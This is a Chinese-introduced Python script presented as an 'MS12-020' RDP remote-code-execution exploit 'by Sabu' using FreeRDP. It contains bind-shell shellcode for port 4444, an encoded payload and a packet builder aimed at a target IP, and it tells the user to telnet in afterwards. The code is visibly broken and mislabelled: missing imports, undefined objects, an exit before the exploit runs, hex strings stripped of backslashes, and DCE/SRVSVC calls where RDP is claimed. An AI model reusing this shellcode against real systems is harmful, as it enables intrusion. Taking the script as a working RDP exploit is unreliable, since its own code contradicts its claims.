freerdp 模块 是LINUX下的远程工具
下载地址是https://github.com/FreeRDP/FreeRDP/downloads
#!/usr/bin/env python
#############################################################################
# MS12-020 Exploit by Sabu
# sabu@fbi.gov
# Uses FreeRDP
#############################################################################
import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import rdpNego
#bind shellcode TCP port 4444
shellcode = 'x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode += 'x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exe9'
shellcode += 'x4axb6xa9x83xeexfcxe2xf4x15x20x5dxe4x01xb3x49x56'
shellcode += 'x16x2ax3dxc5xcdx6ex3dxecxd5xc1xcaxacx91x4bx59x22'
shellcode += 'xa6x52x3dxf6xc9x4bx5dxe0x62x7ex3dxa8x07x7bx76x30'
shellcode += 'x45xcex76xddxeex8bx7cxa4xe8x88x5dx5dxd2x1ex92x81'
shellcode += 'x9cxafx3dxf6xcdx4bx5dxcfx62x46xfdx22xb6x56xb7x42'
shellcode += 'xeax66x3dx20x85x6exaaxc8x2ax7bx6dxcdx62x09x86x22'
shellcode += 'xa9x46x3dxd9xf5xe7x3dxe9xe1x14xdex27xa7x44x5axf9'
shellcode += 'x16x9cxd0xfax8fx22x85x9bx81x3dxc5x9bxb6x1ex49x79'
shellcode += 'x81x81x5bx55xd2x1ax49x7fxb6xc3x53xcfx68xa7xbexab'
shellcode += 'xbcx20xb4x56x39x22x6fxa0x1cxe7xe1x56x3fx19xe5xfa'
shellcode += 'xbax19xf5xfaxaax19x49x79x8fx22xa7xf5x8fx19x3fx48'
shellcode += 'x7cx22x12xb3x99x8dxe1x56x3fx20xa6xf8xbcxb5x66xc1'
shellcode += 'x4dxe7x98x40xbexb5x60xfaxbcxb5x66xc1x0cx03x30xe0'
shellcode += 'xbexb5x60xf9xbdx1exe3x56x39xd9xdex4ex90x8cxcfxfe'
shellcode += 'x16x9cxe3x56x39x2cxdcxcdx8fx22xd5xc4x60xafxdcxf9'
shellcode += 'xb0x63x7ax20x0ex20xf2x20x0bx7bx76x5ax43xb4xf4x84'
shellcode += 'x17x08x9ax3ax64x30x8ex02x42xe1xdexdbx17xf9xa0x56'
shellcode += 'x9cx0ex49x7fxb2x1dxe4xf8xb8x1bxdcxa8xb8x1bxe3xf8'
shellcode += 'x16x9axdex04x30x4fx78xfax16x9cxdcx56x16x7dx49x79'
shellcode += 'x62x1dx4ax2ax2dx2ex49x7fxbbxb5x66xc1x19xc0xb2xf6'
shellcode += 'xbaxb5x60x56x39x4axb6xa9'
#Payload
payload = 'x41x00x5cx00'
payload += 'xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49'
payload += 'x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax68'
payload += 'x58x30x41x31x50x42x41x6bx42x41x78x42x32x42x41x32'
payload += 'x41x41x30x41x41x58x38x42x42x50x75x4bx59x49x6cx43'
payload += 'x5ax7ax4bx32x6dx5ax48x5ax59x69x6fx4bx4fx39x6fx71'
payload += 'x70x6ex6bx62x4cx44x64x71x34x4cx4bx62x65x75x6cx4c'
payload += 'x4bx63x4cx76x65x70x78x35x51x48x6fx6cx4bx50x4fx74'
payload += 'x58x6ex6bx33x6fx55x70x37x71x48x6bx57x39x6cx4bx66'
payload += 'x54x6ex6bx46x61x7ax4ex47x41x6bx70x7ax39x4cx6cx4c'
payload += 'x44x6fx30x62x54x44x47x38x41x4bx7ax54x4dx44x41x4b'
payload += 'x72x78x6bx39x64x35x6bx53x64x75x74x46x48x72x55x79'
payload += 'x75x6cx4bx53x6fx76x44x44x41x48x6bx35x36x4ex6bx54'
payload += 'x4cx30x4bx6cx4bx51x4fx65x4cx65x51x38x6bx77x73x36'
payload += 'x4cx4ex6bx6ex69x30x6cx66x44x45x4cx30x61x69x53x30'
payload += 'x31x79x4bx43x54x6cx4bx63x73x44x70x4ex6bx77x30x66'
payload += 'x6cx6cx4bx72x50x45x4cx4cx6dx4ex6bx73x70x64x48x73'
payload += 'x6ex55x38x6ex6ex32x6ex34x4ex58x6cx62x70x39x6fx6b'
payload += 'x66x70x66x61x43x52x46x71x78x30x33x55x62x63x58x63'
payload += 'x47x34x33x65x62x41x4fx30x54x39x6fx4ax70x52x48x5a'
payload += 'x6bx38x6dx6bx4cx75x6bx30x50x6bx4fx6ex36x53x6fx6f'
payload += 'x79x4ax45x32x46x6fx71x6ax4dx34x48x77x72x73x65x73'
payload += 'x5ax37x72x69x6fx58x50x52x48x4ex39x76x69x4ax55x4c'
payload += 'x6dx32x77x69x6fx59x46x50x53x43x63x41x43x70x53x70'
payload += 'x53x43x73x50x53x62x63x70x53x79x6fx6ax70x35x36x61'
payload += 'x78x71x32x78x38x71x76x30x53x4bx39x69x71x4dx45x33'
payload += 'x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46x32'
payload += 'x4ax56x70x66x31x76x35x59x6fx58x50x32x48x4dx74x4e'
payload += 'x4dx66x4ex7ax49x50x57x6bx4fx6ex36x46x33x56x35x39'
payload += 'x6fx78x50x33x58x6bx55x51x59x4ex66x50x49x51x47x39'
payload += 'x6fx48x56x32x70x32x74x62x74x46x35x4bx4fx38x50x6e'
payload += 'x73x55x38x4dx37x71x69x69x56x71x69x61x47x6bx4fx6e'
payload += 'x36x36x35x79x6fx6ax70x55x36x31x7ax71x74x32x46x51'
payload += 'x78x52x43x70x6dx4fx79x4dx35x72x4ax66x30x42x79x64'
payload += 'x69x7ax6cx4bx39x48x67x62x4ax57x34x4fx79x6dx32x37'
payload += 'x41x6bx70x7ax53x6ex4ax69x6ex32x62x46x4dx6bx4ex70'
payload += 'x42x44x6cx4cx53x6ex6dx31x6ax64x78x4cx6bx4ex4bx4e'
payload += 'x4bx43x58x70x72x69x6ex6dx63x37x66x79x6fx63x45x73'
payload += 'x74x4bx4fx7ax76x63x6bx31x47x72x72x41x41x50x51x61'
payload += 'x41x70x6ax63x31x41x41x46x31x71x45x51x41x4bx4fx78'
payload += 'x50x52x48x4cx6dx79x49x54x45x38x4ex53x63x6bx4fx6e'
payload += 'x36x30x6ax49x6fx6bx4fx70x37x4bx4fx4ex30x4ex6bx30'
payload += 'x57x69x6cx6bx33x4bx74x62x44x79x6fx6bx66x66x32x6b'
payload += 'x4fx4ex30x53x58x58x70x4ex6ax55x54x41x4fx52x73x4b'
payload += 'x4fx69x46x4bx4fx6ex30x68';
class SRVSVC_Exploit(Thread):
def __init__(self, target, port=3389):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
def __DCEPacket(self):
print '[-]Connecting'
self.__trans = rdp.transport.cert('rdp_np:%s\x00\x89]' % self.target)
self.__trans.connect()
print '[-]connected' % self.target
# Making teh packet
self.__stub='x01x00x00x00'
self.__stub+='xd6x00x00x00x00x00x00x00xd6x00x00x00'
self.__stub+=shellcode
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x00x00x00x00'
self.__stub+='x2fx00x00x00x00x00x00x00x2fx00x00x00'
self.__stub+=payload
self.__stub+='x00x00x00x00'
self.__stub+='x02x00x00x00x02x00x00x00'
self.__stub+='x00x00x00x00x02x00x00x00'
self.__stub+='x5cx00x00x00x01x00x00x00'
self.__stub+='x01x00x00x00x90x90xb0x53x6bxC0x28x03xd8xffxd3'
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub)
print '[-]Exploit successfull!...nTelnet to port 4444 on target machine.'
if __name__ == '__main__':
target = sys.argv[1]
print 'nUsage: %s <target ip> n' % sys.argv[0]
sys.exit(-1)
current = SRVSVC_Exploit(target)
current.start()